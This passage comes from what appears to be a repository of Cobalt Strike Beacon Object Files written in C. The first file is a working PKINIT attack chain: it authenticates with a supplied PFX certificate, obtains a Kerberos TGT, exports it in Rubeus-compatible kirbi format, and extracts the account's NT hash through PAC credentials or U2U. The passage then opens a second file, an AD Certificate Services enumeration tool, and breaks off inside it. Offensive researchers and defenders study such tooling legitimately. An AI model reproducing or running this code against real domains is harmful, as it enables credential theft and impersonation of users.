                BeaconPrintf(CALLBACK_OUTPUT, "[!] %s", GetKrbErrorDesc(errCode));
                break;
            }
        }
        /* Try to find e-text [11] GeneralString */
        for (i = 0; i < asRepLen - 5; i++) {
            if (asRep[i] == 0xAB) { /* e-text [11] */
                int textLen;
                int lenBytes = DecodeLength(asRep, i+1, &textLen);
                if (asRep[i+1+lenBytes] == 0x1B) { /* GeneralString */
                    int strLen;
                    int strLenBytes = DecodeLength(asRep, i+2+lenBytes, &strLen);
                    if (strLen > 0 && strLen < 256) {
                        char etext[256] = {0};
                        memcpy(etext, asRep + i + 2 + lenBytes + strLenBytes, strLen < 255 ? strLen : 255);
                        BeaconPrintf(CALLBACK_OUTPUT, "[!] e-text: %s", etext);
                    }
                }
                break;
            }
        }
        return;
    }

    if (asRep[0] != 0x6B) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Unexpected response type: 0x%02X", asRep[0]);
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] TGT obtained!");

    /* Step 1: Extract KDC's DH public key */
    int kdcPubKeyLen;
    BYTE* kdcPubKey = ExtractKdcDhPublicKey(asRep, asRepLen, &kdcPubKeyLen);
    if (!kdcPubKey) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract KDC DH public key");
        return;
    }

    /* Step 2: Extract server DH nonce (optional) */
    int serverNonceLen;
    BYTE* serverNonce = ExtractServerDhNonce(asRep, asRepLen, &serverNonceLen);

    /* Step 3: Compute DH shared secret: KDC_pubkey^our_privkey mod p */
    BigInt p, y, x, sharedSecret;
    bigint_from_bytes(&p, DH_P_MODP2, sizeof(DH_P_MODP2));
    bigint_from_bytes(&y, kdcPubKey, kdcPubKeyLen);
    bigint_from_bytes(&x, g_dhPrivateKey, sizeof(g_dhPrivateKey));

    bigint_modpow(&sharedSecret, &y, &x, &p);

    BYTE sharedSecretBytes[128];
    bigint_to_bytes(&sharedSecret, sharedSecretBytes, 128);

    /* Step 4: Derive reply key using kTruncate (32 bytes for AES256) */
    BYTE replyKey[32];
    DeriveSessionKey(sharedSecretBytes, 128, serverNonce, serverNonceLen, replyKey, 32);

    /* Store reply key globally */
    memcpy(g_replyKey, replyKey, 32);

    /* Step 5: Extract and decrypt enc-part */
    int encPartLen;
    BYTE* encPart = ExtractEncPartFromAsRep(asRep, asRepLen, &encPartLen);
    if (!encPart) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract enc-part");
        free(kdcPubKey);
        if (serverNonce) free(serverNonce);
        return;
    }

    /* Decrypt enc-part with reply key (key usage 3) */
    int decryptedLen;
    BYTE* decrypted = KerberosDecrypt(ETYPE_AES256_CTS_HMAC_SHA1, KRB_KEY_USAGE_AS_REP_ENCPART,
                                       replyKey, 32, encPart, encPartLen, &decryptedLen);
    free(encPart);

    if (!decrypted) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt enc-part");
        free(kdcPubKey);
        if (serverNonce) free(serverNonce);
        return;
    }

    /* Step 6: Extract session key from EncASRepPart */
    int sessionKeyLen, sessionKeyType;
    BYTE* sessionKey = ExtractSessionKey(decrypted, decryptedLen, &sessionKeyLen, &sessionKeyType);
    free(decrypted);

    if (!sessionKey) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract session key");
        free(kdcPubKey);
        if (serverNonce) free(serverNonce);
        return;
    }

    /* Store session key globally */
    memcpy(g_sessionKey, sessionKey, sessionKeyLen);

    /* Output TGT in kirbi format (Rubeus compatible) */
    {
        int kirbiTgtLen;
        BYTE* kirbiTgt = ExtractTicketFromAsRep(asRep, asRepLen, &kirbiTgtLen);
        if (kirbiTgt) {
            OutputKirbi(kirbiTgt, kirbiTgtLen, sessionKey, sessionKeyLen, sessionKeyType, user, realm);
            free(kirbiTgt);
        }
    }

    /* Step 7: Look for PA-PAC-CREDENTIALS and decrypt */
    int pacCredLen;
    BYTE* pacCred = ExtractPaPacCredentials(asRep, asRepLen, &pacCredLen);
    if (pacCred) {
        /* Decrypt with session key (key usage 16) */
        int decCredLen;
        BYTE* decCred = KerberosDecrypt(sessionKeyType, KRB_KEY_USAGE_PAC_CREDENTIAL,
                                        sessionKey, sessionKeyLen, pacCred, pacCredLen, &decCredLen);
        free(pacCred);

        if (decCred) {
            ParsePacCredentialData(decCred, decCredLen);
            free(decCred);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decrypt PA-PAC-CREDENTIALS");
        }
    } else if (!noUnpac) {
        /* Extract TGT from AS-REP for U2U */
        int tgtLen;
        BYTE* tgt = ExtractTicketFromAsRep(asRep, asRepLen, &tgtLen);
        if (tgt) {
            /* Perform U2U to get NT hash */
            PerformU2U(kdcHost, user, realm, tgt, tgtLen, sessionKey, sessionKeyLen, replyKey, 32);
            free(tgt);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to extract TGT from AS-REP");
        }
    }

    /* Cleanup */
    free(kdcPubKey);
    free(sessionKey);
    if (serverNonce) free(serverNonce);
}

/*
 * =============================================================================
 * Certificate Loading - From Base64 or File
 * =============================================================================
 */

/* Load certificate from base64 encoded PFX */
static PCCERT_CONTEXT LoadCertificateFromBase64(const char* base64Pfx, const char* password) {
    BYTE* pfxData = NULL;
    DWORD pfxLen = 0;
    HCERTSTORE hStore = NULL;
    PCCERT_CONTEXT pCert = NULL;
    WCHAR wPassword[256] = {0};

    if (!base64Pfx || !base64Pfx[0]) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] No PFX data provided");
        return NULL;
    }

    /* Convert password to wide string */
    if (password && password[0]) {
        MultiByteToWideChar(CP_ACP, 0, password, -1, wPassword, 256);
    }

    /* Decode base64 to binary */
    DWORD base64Len = (DWORD)strlen(base64Pfx);

    /* Get required buffer size - use ANY flag for flexibility */
    if (!CryptStringToBinaryA(base64Pfx, base64Len, CRYPT_STRING_BASE64_ANY, NULL, &pfxLen, NULL, NULL)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to get base64 decode size: 0x%08X", GetLastError());
        return NULL;
    }

    pfxData = (BYTE*)malloc(pfxLen);
    if (!pfxData) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to allocate memory for PFX");
        return NULL;
    }

    /* Decode base64 */
    if (!CryptStringToBinaryA(base64Pfx, base64Len, CRYPT_STRING_BASE64_ANY, pfxData, &pfxLen, NULL, NULL)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to decode base64: 0x%08X", GetLastError());
        free(pfxData);
        return NULL;
    }

    /* Import PFX */
    CRYPT_DATA_BLOB pfxBlob;
    pfxBlob.pbData = pfxData;
    pfxBlob.cbData = pfxLen;

    hStore = PFXImportCertStore(&pfxBlob, wPassword, CRYPT_EXPORTABLE | PKCS12_ALLOW_OVERWRITE_KEY);
    free(pfxData);

    if (!hStore) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to import PFX: 0x%08X", GetLastError());
        return NULL;
    }

    /* Get first certificate with private key */
    pCert = CertEnumCertificatesInStore(hStore, NULL);
    if (!pCert) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] No certificates in PFX");
        CertCloseStore(hStore, 0);
        return NULL;
    }

    /* Note: We're not closing the store yet as the cert context needs it */
    return pCert;
}

/* Load certificate from raw PFX bytes */
static PCCERT_CONTEXT LoadCertificateFromBytes(const BYTE* pfxBytes, int pfxLen, const char* password) {
    HCERTSTORE hStore = NULL;
    PCCERT_CONTEXT pCert = NULL;
    WCHAR wPassword[256] = {0};

    if (!pfxBytes || pfxLen == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] No PFX data provided");
        return NULL;
    }

    if (password && password[0]) {
        MultiByteToWideChar(CP_ACP, 0, password, -1, wPassword, 256);
    }

    CRYPT_DATA_BLOB pfxBlob;
    pfxBlob.pbData = (BYTE*)pfxBytes;
    pfxBlob.cbData = pfxLen;

    hStore = PFXImportCertStore(&pfxBlob, wPassword, CRYPT_EXPORTABLE | PKCS12_ALLOW_OVERWRITE_KEY);

    if (!hStore) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to import PFX: 0x%08X", GetLastError());
        return NULL;
    }

    pCert = CertEnumCertificatesInStore(hStore, NULL);
    if (!pCert) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] No certificates in PFX");
        CertCloseStore(hStore, 0);
        return NULL;
    }

    return pCert;
}

/*
 * =============================================================================
 * Get KDC Address
 * =============================================================================
 */

static void GetKdcForDomain(const char* domain, char* kdcHost, int kdcHostLen) {
    WCHAR wDomain[256];
    PDOMAIN_CONTROLLER_INFOW dcInfo = NULL;

    MultiByteToWideChar(CP_ACP, 0, domain, -1, wDomain, 256);

    if (DsGetDcNameW(NULL, wDomain, NULL, NULL, DS_IS_DNS_NAME | DS_RETURN_DNS_NAME, &dcInfo) == ERROR_SUCCESS) {
        WideCharToMultiByte(CP_ACP, 0, dcInfo->DomainControllerName + 2, -1, kdcHost, kdcHostLen, NULL, NULL);
        NetApiBufferFree(dcInfo);
    } else {
        /* Fallback to domain name */
        strcpy(kdcHost, domain);
    }
}

/*
 * =============================================================================
 * Main Attack Chain
 * =============================================================================
 */

int my_strcmp(const char *s1, const char *s2)
{
    while (*s1 && (*s1 == *s2)) {
        s1++;
        s2++;
    }
    return *(unsigned char*)s1 - *(unsigned char*)s2;
}

void PkinitUnPAC(BYTE* pfxBytes, int pfxLen, char* pfxBase64, char* password, char* domain, char* kdcHost, int noUnpac) {
    PCCERT_CONTEXT pCert = NULL;
    char user[256] = {0};
    char domainBuf[256] = {0};
    char kdcBuf[256] = {0};

    if (domain && domain[0])
        strcpy(domainBuf, domain);

    if (!domainBuf[0]) {
        WCHAR wszDomain[256] = {0};
        DWORD dwSize = 256;
        /* ComputerNameDnsDomain = 2 */
        if (GetComputerNameExW(2, wszDomain, &dwSize) && wszDomain[0]) {
            WideCharToMultiByte(CP_UTF8, 0, wszDomain, -1, domainBuf, sizeof(domainBuf), NULL, NULL);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Auto-detected domain: %s", domainBuf);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Domain not specified and auto-detection failed");
            return;
        }
    }

    /* ===== PHASE 1: Load Certificate ===== */
    if (pfxBytes && pfxLen > 0) {
        pCert = LoadCertificateFromBytes(pfxBytes, pfxLen, password);
    } else if (pfxBase64 && pfxBase64[0]) {
        pCert = LoadCertificateFromBase64(pfxBase64, password);
    }

    if (!pCert) {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load certificate");
        return;
    }

    /* Extract user from certificate SAN (UPN) if not provided */
    if (!user[0]) {
        PCERT_EXTENSION pExt = NULL;
        int i;
        for (i = 0; i < (int)pCert->pCertInfo->cExtension; i++) {
            if (my_strcmp(pCert->pCertInfo->rgExtension[i].pszObjId, szOID_SUBJECT_ALT_NAME2) == 0) {
                pExt = &pCert->pCertInfo->rgExtension[i];
                break;
            }
        }
        if (pExt) {
            CERT_ALT_NAME_INFO* pAltName = NULL;
            DWORD dwSize = 0;
            if (CryptDecodeObjectEx(X509_ASN_ENCODING, szOID_SUBJECT_ALT_NAME2,
                    pExt->Value.pbData, pExt->Value.cbData,
                    CRYPT_DECODE_ALLOC_FLAG, NULL, &pAltName, &dwSize) && pAltName) {
                DWORD j;
                for (j = 0; j < pAltName->cAltEntry; j++) {
                    if (pAltName->rgAltEntry[j].dwAltNameChoice == CERT_ALT_NAME_OTHER_NAME) {
                        if (my_strcmp(pAltName->rgAltEntry[j].pOtherName->pszObjId, szOID_NT_PRINCIPAL_NAME) == 0) {
                            /* Decode the UPN */
                            LPWSTR wszUPN = NULL;
                            DWORD dwUPNSize = 0;
                            if (CryptDecodeObjectEx(X509_ASN_ENCODING, X509_UNICODE_ANY_STRING,
                                    pAltName->rgAltEntry[j].pOtherName->Value.pbData,
                                    pAltName->rgAltEntry[j].pOtherName->Value.cbData,
                                    CRYPT_DECODE_ALLOC_FLAG, NULL, &wszUPN, &dwUPNSize) && wszUPN) {
                                CERT_NAME_VALUE* pNameValue = (CERT_NAME_VALUE*)wszUPN;
                                if (pNameValue->Value.pbData) {
                                    char szUPN[256] = {0};
                                    WideCharToMultiByte(CP_UTF8, 0, (LPCWSTR)pNameValue->Value.pbData, -1, szUPN, 256, NULL, NULL);
                                    char* pAt = strchr(szUPN, '@');
                                    if (pAt) {
                                        int userLen = (int)(pAt - szUPN);
                                        memcpy(user, szUPN, userLen);
                                        user[userLen] = '\0';
                                        if (!domainBuf[0]) {
                                            strcpy(domainBuf, pAt + 1);
                                        }
                                        BeaconPrintf(CALLBACK_OUTPUT, "[*] Extracted UPN from cert: %s", szUPN);
                                    }
                                }
                                LocalFree(wszUPN);
                            }
                            break;
                        }
                    }
                }
                LocalFree(pAltName);
            }
        }
        if (!user[0]) {
            BeaconPrintf(CALLBACK_OUTPUT, "[!] Could not extract UPN from certificate");
            CertFreeCertificateContext(pCert);
            return;
        }
    }

    /* ===== PHASE 2: Get KDC ===== */
    if (kdcHost && kdcHost[0]) {
        strcpy(kdcBuf, kdcHost);
    } else {
        GetKdcForDomain(domainBuf, kdcBuf, sizeof(kdcBuf));
    }

    /* ===== PHASE 3: PKINIT Authentication ===== */

    /* Build PKINIT AS-REQ */
    int asReqLen;
    BYTE* asReq = BuildPkinitAsReq(pCert, user, domainBuf, &asReqLen);

    if (asReq) {
        /* Send to KDC */
        int asRepLen;
        BYTE* asRep = SendToKdc(kdcBuf, 88, asReq, asReqLen, &asRepLen);

        if (asRep) {
            /* ===== PHASE 4: Process AS-REP ===== */
            /* Convert domain to uppercase for realm */
            char realm[256] = {0};
            int ri;
            for (ri = 0; domainBuf[ri] && ri < 255; ri++) {
                realm[ri] = (domainBuf[ri] >= 'a' && domainBuf[ri] <= 'z')
                          ? domainBuf[ri] - 'a' + 'A' : domainBuf[ri];
            }

            ProcessAsRep(asRep, asRepLen, pCert, user, realm, kdcBuf, noUnpac);
            free(asRep);
        }

        free(asReq);
    }

    /* Cleanup */
    if (pCert) CertFreeCertificateContext(pCert);
}

/* LDAP constants */
#ifndef LDAP_PORT
#define LDAP_PORT 389
#endif
#ifndef LDAP_SCOPE_SUBTREE
#define LDAP_SCOPE_SUBTREE 0x02
#endif
#ifndef LDAP_AUTH_NEGOTIATE
#define LDAP_AUTH_NEGOTIATE 0x0486
#endif
#ifndef LDAP_OPT_REFERRALS
#define LDAP_OPT_REFERRALS 0x08
#endif
#ifndef LDAP_SUCCESS
#define LDAP_SUCCESS 0x00
#endif

/*
 * BOF Entry Point for Certificate Authentication
 * Arguments: PFX (base64), Password, DC (optional)
 */
void go(char* args, int alen) {
    datap parser;
    char* szPfxB64 = NULL;
    char* szPassword = NULL;
    char* szDC = NULL;
    BYTE* pbPfx = NULL;
    int cbPfx = 0;
    short noUnpac = 0;

    BeaconDataParse(&parser, args, alen);

    szPfxB64   = BeaconDataExtract(&parser, NULL);
    szPassword = BeaconDataExtract(&parser, NULL);
    szDC       = BeaconDataExtract(&parser, NULL);
    pbPfx      = (BYTE*)BeaconDataExtract(&parser, &cbPfx);
    noUnpac    = BeaconDataShort(&parser);

    if (pbPfx && cbPfx > 0) {
        /* PFX passed as raw bytes */
        PkinitUnPAC(pbPfx, cbPfx, NULL, szPassword ? szPassword : "", NULL, szDC, noUnpac);
    } else if (szPfxB64 && szPfxB64[0]) {
        /* PFX passed as base64 */
        PkinitUnPAC(NULL, 0, szPfxB64, szPassword ? szPassword : "", NULL, szDC, noUnpac);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[!] Usage: certi auth --cert <PFX_Base64> [--password <pass>] [--dc <dc>] [--no-unpac]");
        BeaconPrintf(CALLBACK_OUTPUT, "[!]    or: certi auth --pfx <file> [--password <pass>] [--dc <dc>] [--no-unpac]");
        return;
    }
}

================================================
FILE: AD-BOF/ADCS-BOF/src/enum/adcs_enum_com2.c
================================================
#include <windows.h>
#include <stdio.h>
#include <oleauto.h>
#include <wchar.h>
#include <io.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdlib.h>
#include <combaseapi.h>
#include <sddl.h>
#include <iads.h>
#include "beacon.h"
#include "bofdefs.h"
#include "adcs_enum_com2.h"


typedef HRESULT WINAPI (*CAEnumFirstCA_t)(IN LPCWSTR wszScope, IN DWORD dwFlags, OUT LPVOID * phCAInfo);
typedef HRESULT WINAPI (*CAEnumNextCA_t)(IN LPVOID hPrevCA, OUT LPVOID * phCAInfo);
typedef HRESULT WINAPI (*CACloseCA_t)(IN LPVOID hCA);
typedef DWORD WINAPI (*CACountCAs_t)(IN LPVOID hCAInfo);
typedef LPCWSTR WINAPI (*CAGetDN_t)(IN LPVOID hCAInfo);
typedef HRESULT WINAPI (*CAGetCAProperty_t)(IN LPVOID hCAInfo, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue);
typedef HRESULT WINAPI (*CAFreeCAProperty_t)(IN LPVOID hCAInfo, IN PZPWSTR awszPropertyValue);
typedef HRESULT WINAPI (*CAGetCAFlags_t)(IN LPVOID hCAInfo, OUT DWORD  *pdwFlags);
typedef HRESULT WINAPI (*CAGetCACertificate_t)(IN LPVOID hCAInfo, OUT PCCERT_CONTEXT *ppCert);
typedef HRESULT WINAPI (*CAGetCAExpiration_t)(IN LPVOID hCAInfo, OUT DWORD * pdwExpiration, OUT DWORD * pdwUnits);
typedef HRESULT WINAPI (*CAGetCASecurity_t)(IN LPVOID hCAInfo, OUT PSECURITY_DESCRIPTOR * ppSD);
typedef HRESULT WINAPI (*CAGetAccessRights_t)(IN LPVOID hCAInfo, IN DWORD dwContext, OUT DWORD *pdwAccessRights);
typedef HRESULT WINAPI (*CAEnumCertTypesForCA_t)(IN LPVOID hCAInfo, IN DWORD dwFlags, OUT LPVOID * phCertType);
typedef HRESULT WINAPI (*CAEnumCertTypes_t)(IN DWORD dwFlags, OUT LPVOID * phCertType);
typedef HRESULT WINAPI (*CAEnumNextCertType_t)(IN LPVOID hPrevCertType, OUT LPVOID * phCertType);
typedef DWORD WINAPI (*CACountCertTypes_t)(IN LPVOID hCertType);
typedef HRESULT WINAPI (*CACloseCertType_t)(IN LPVOID hCertType);
typedef HRESULT WINAPI (*CAGetCertTypeProperty_t)(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue);
typedef HRESULT WINAPI (*CAGetCertTypePropertyEx_t)(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT LPVOID *pPropertyValue);
typedef HRESULT WINAPI (*CAFreeCertTypeProperty_t)(IN LPVOID hCertType, IN PZPWSTR awszPropertyValue);
typedef HRESULT WINAPI (*CAGetCertTypeExtensionsEx_t)(IN LPVOID hCertType, IN DWORD dwFlags, IN LPVOID pParam, OUT PCERT_EXTENSIONS * ppCertExtensions);
typedef HRESULT WINAPI (*CAFreeCertTypeExtensions_t)(IN LPVOID hCertType, IN PCERT_EXTENSIONS pCertExtensions);
typedef HRESULT WINAPI (*CAGetCertTypeFlagsEx_t)(IN LPVOID hCertType, IN DWORD dwOption, OUT DWORD * pdwFlags);
typedef HRESULT WINAPI (*CAGetCertTypeExpiration_t)(IN LPVOID hCertType, OUT OPTIONAL FILETIME * pftExpiration, OUT OPTIONAL FILETIME * pftOverlap);
typedef HRESULT WINAPI (*CACertTypeGetSecurity_t)(IN LPVOID hCertType, OUT PSECURITY_DESCRIPTOR * ppSD);
typedef HRESULT WINAPI (*caTranslateFileTimePeriodToPeriodUnits_t)(IN FILETIME const *pftGMT, IN BOOL Flags, OUT DWORD *pcPeriodUnits, OUT LPVOID*prgPeriodUnits);
typedef HRESULT WINAPI (*CAGetCertTypeAccessRights_t)(IN LPVOID hCertType, IN DWORD dwContext, OUT DWORD *pdwAccessRights);

#define CERTCLI$CAEnumFirstCA ((CAEnumFirstCA_t)DynamicLoad("CERTCLI","CAEnumFirstCA"))
#define CERTCLI$CAEnumNextCA ((CAEnumNextCA_t)DynamicLoad("CERTCLI","CAEnumNextCA"))
#define CERTCLI$CACloseCA ((CACloseCA_t)DynamicLoad("CERTCLI","CACloseCA"))
#define CERTCLI$CACountCAs ((CACountCAs_t)DynamicLoad("CERTCLI","CACountCAs"))
#define CERTCLI$CAGetDN ((CAGetDN_t)DynamicLoad("CERTCLI","CAGetDN"))
#define CERTCLI$CAGetCAProperty ((CAGetCAProperty_t)DynamicLoad("CERTCLI","CAGetCAProperty"))
#define CERTCLI$CAFreeCAProperty ((CAFreeCAProperty_t)DynamicLoad("CERTCLI","CAFreeCAProperty"))
#define CERTCLI$CAGetCAFlags ((CAGetCAFlags_t)DynamicLoad("CERTCLI","CAGetCAFlags"))
#define CERTCLI$CAGetCACertificate ((CAGetCACertificate_t)DynamicLoad("CERTCLI","CAGetCACertificate"))
#define CERTCLI$CAGetCAExpiration ((CAGetCAExpiration_t)DynamicLoad("CERTCLI","CAGetCAExpiration"))
#define CERTCLI$CAGetCASecurity ((CAGetCASecurity_t)DynamicLoad("CERTCLI","CAGetCASecurity"))
#define CERTCLI$CAGetAccessRights ((CAGetAccessRights_t)DynamicLoad("CERTCLI","CAGetAccessRights"))
#define CERTCLI$CAEnumCertTypesForCA ((CAEnumCertTypesForCA_t)DynamicLoad("CERTCLI","CAEnumCertTypesForCA"))
#define CERTCLI$CAEnumCertTypes ((CAEnumCertTypes_t)DynamicLoad("CERTCLI","CAEnumCertTypes"))
#define CERTCLI$CAEnumNextCertType ((CAEnumNextCertType_t)DynamicLoad("CERTCLI","CAEnumNextCertType"))
#define CERTCLI$CACountCertTypes ((CACountCertTypes_t)DynamicLoad("CERTCLI","CACountCertTypes"))
#define CERTCLI$CACloseCertType ((CACloseCertType_t)DynamicLoad("CERTCLI","CACloseCertType"))
#define CERTCLI$CAGetCertTypeProperty ((CAGetCertTypeProperty_t)DynamicLoad("CERTCLI","CAGetCertTypeProperty"))
#define CERTCLI$CAGetCertTypePropertyEx ((CAGetCertTypePropertyEx_t)DynamicLoad("CERTCLI","CAGetCertTypePropertyEx"))
#define CERTCLI$CAFreeCertTypeProperty ((CAFreeCertTypeProperty_t)DynamicLoad("CERTCLI","CAFreeCertTypeProperty"))
#define CERTCLI$CAGetCertTypeExtensionsEx ((CAGetCertTypeExtensionsEx_t)DynamicLoad("CERTCLI","CAGetCertTypeExtensionsEx"))
#define CERTCLI$CAFreeCertTypeExtensions ((CAFreeCertTypeExtensions_t)DynamicLoad("CERTCLI","CAFreeCertTypeExtensions"))
#define CERTCLI$CAGetCertTypeFlagsEx ((CAGetCertTypeFlagsEx_t)DynamicLoad("CERTCLI","CAGetCertTypeFlagsEx"))
#define CERTCLI$CAGetCertTypeExpiration ((CAGetCertTypeExpiration_t)DynamicLoad("CERTCLI","CAGetCertTypeExpiration"))
#define CERTCLI$CACertTypeGetSecurity ((CACertTypeGetSecurity_t)DynamicLoad("CERTCLI","CACertTypeGetSecurity"))
#define CERTCLI$caTranslateFileTimePeriodToPeriodUnits ((caTranslateFileTimePeriodToPeriodUnits_t)DynamicLoad("CERTCLI","caTranslateFileTimePeriodToPeriodUnits"))
#define CERTCLI$CAGetCertTypeAccessRights ((CAGetCertTypeAccessRights_t)DynamicLoad("CERTCLI","CAGetCertTypeAccessRights"))


typedef PCCERT_CONTEXT WINAPI (*CertCreateCertificateContext_t)(DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded);
typedef DWORD WINAPI (*CertGetNameStringW_t)(PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString);
typedef WINBOOL WINAPI (*CertGetCertificateContextProperty_t)(PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData);
typedef WINBOOL WINAPI (*CertGetCertificateChain_t)(HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext);
typedef VOID WINAPI (*CertFreeCertificateChain_t)(PCCERT_CHAIN_CONTEXT pChainContext);

#define CRYPT32$CertCreateCertificateContext ((CertCreateCertificateContext_t)DynamicLoad("CRYPT32","CertCreateCertificateContext"))
#define CRYPT32$CertGetNameStringW ((CertGetNameStringW_t)DynamicLoad("CRYPT32","CertGetNameStringW"))
#define CRYPT32$CertGetCertificateContextProperty ((CertGetCertificateContextProperty_t)DynamicLoad("CRYPT32","CertGetCertificateContextProperty"))
#define CRYPT32$CertGetCertificateChain ((CertGetCertificateChain_t)DynamicLoad("CRYPT32","CertGetCertificateChain"))
#define CRYPT32$CertFreeCertificateChain ((CertFreeCertificateChain_t)DynamicLoad("CRYPT32","CertFreeCertificateChain"))


typedef BSTR WINAPI (*SysAllocString_t)(const OLECHAR *);
typedef UINT WINAPI (*SysStringLen_t)(BSTR);
typedef void WINAPI (*SysFreeString_t)(BSTR);
typedef void WINAPI (*SafeArrayDestroy_t)(SAFEARRAY *psa);
typedef void WINAPI (*VariantInit_t)(VARIANTARG *pvarg);
typedef void WINAPI (*VariantClear_t)(VARIANTARG *pvarg);

#define OLEAUT32$SysAllocString ((SysAllocString_t)DynamicLoad("OLEAUT32","SysAllocString"))
#define OLEAUT32$SysStringLen ((SysStringLen_t)DynamicLoad("OLEAUT32","SysStringLen"))
#define OLEAUT32$SysFreeString ((SysFreeString_t)DynamicLoad("OLEAUT32","SysFreeString"))
#define OLEAUT32$SafeArrayDestroy ((SafeArrayDestroy_t)DynamicLoad("OLEAUT32","SafeArrayDestroy"))
#define OLEAUT32$VariantInit ((VariantInit_t)DynamicLoad("OLEAUT32","VariantInit"))
#define OLEAUT32$VariantClear ((VariantClear_t)DynamicLoad("OLEAUT32","VariantClear"))


typedef HRESULT WINAPI (*CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCoInit);
typedef HRESULT WINAPI (*CoUninitialize_t)(void);
typedef int WINAPI (*StringFromGUID2_t)(REFGUID rguid, LPOLESTR lpsz, int cchMax);

#define OLE32$CoInitializeEx ((CoInitializeEx_t)DynamicLoad("OLE32","CoInitializeEx"))
#define OLE32$CoUninitialize ((CoUninitialize_t)DynamicLoad("OLE32","CoUninitialize"))
#define OLE32$StringFromGUID2 ((StringFromGUID2_t)DynamicLoad("OLE32","StringFromGUID2"))


#define CHECK_RETURN_FALSE( function, return_value, result) \
	if (FALSE == return_value) \
	{ \
		result = KERNEL32$GetLastError(); \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
		goto fail; \
	}
#define CHECK_RETURN_NULL( function, return_value, result) \
	if (NULL == return_value) \
	{ \
		result = E_INVALIDARG; \
		BeaconPrintf(CALLBACK_ERROR, "%s failed\n", function); \
		goto fail; \
	}
#define CHECK_RETURN_FAIL( function, result ) \
	if (FAILED(result)) \
	{ \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
		goto fail; \
	}
#define CHECK_RETURN_SOFT_FAIL( function, result ) \
	if (FAILED(result)) \
	{ \
		BeaconPrintf(CALLBACK_ERROR, "%s failed: 0x%08lx\n", function, result); \
	}
#define SAFE_DESTROY( arraypointer )	\
	if ( (arraypointer) != NULL )	\
	{	\
		OLEAUT32$SafeArrayDestroy(arraypointer);	\
		(arraypointer) = NULL;	\
	}
#define SAFE_RELEASE( interfacepointer )	\
	if ( (interfacepointer) != NULL )	\
	{	\
		(interfacepointer)->lpVtbl->Release(interfacepointer);	\
		(interfacepointer) = NULL;	\
	}
#define SAFE_FREE( string_ptr )	\
	if ( (string_ptr) != NULL )	\
	{	\
		OLEAUT32$SysFreeString(string_ptr);	\
		(string_ptr) = NULL;	\
	}
#define SAFE_LOCAL_FREE( local_ptr ) \
	if (local_ptr) \
	{ \
		KERNEL32$LocalFree(local_ptr); \
		local_ptr = NULL; \
	}
#define SAFE_INT_FREE( int_ptr ) \
	if (int_ptr) \
	{ \
		intFree(int_ptr); \
		int_ptr = NULL; \
	}
#define SAFE_CERTFREECERTIFICATECHAIN( cert_chain_context ) \
	if(cert_chain_context) \
	{ \
		CRYPT32$CertFreeCertificateChain(cert_chain_context); \
		cert_chain_context = NULL; \
	}	


#define DEFINE_MY_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) const GUID name = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
DEFINE_MY_GUID(CertificateEnrollment,0x0e10c968,0x78fb,0x11d2,0x90,0xd4,0x00,0xc0,0x4f,0x79,0xdc,0x55);
DEFINE_MY_GUID(CertificateAutoEnrollment,0xa05b8cc2,0x17bc,0x4802,0xa7,0x10,0xe7,0xc1,0x5a,0xb8,0x66,0xa2);
DEFINE_MY_GUID(CertificateAll,0x00000000,0x0000,0x0000,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
DEFINE_MY_GUID(ManageCA,0x05000000,0x0015,0x0000,0xf9,0xbf,0xaa,0x22,0x07,0x95,0x8d,0xdd);

HRESULT adcs_enum_com2()
{
	HRESULT hr = S_OK;

	hr = OLE32$CoInitializeEx( NULL, COINIT_APARTMENTTHREADED );
	CHECK_RETURN_FAIL("CoInitializeEx", hr);
	
	hr = _adcs_get_PolicyServerListManager();
	CHECK_RETURN_FAIL("_adcs_get_PolicyServerListManager", hr);

	hr = S_OK;

	//internal_printf("\n adcs_enum_com2 SUCCESS.\n");
	
fail:	
	
	OLE32$CoUninitialize();

	return hr;
} // end adcs_enum_com2

HRESULT _adcs_get_PolicyServerListManager()
{
	HRESULT hr = S_OK;
	IX509PolicyServerListManager * pPolicyServerListManager = NULL;
	LONG lPolicyServerUrlCount = 0;
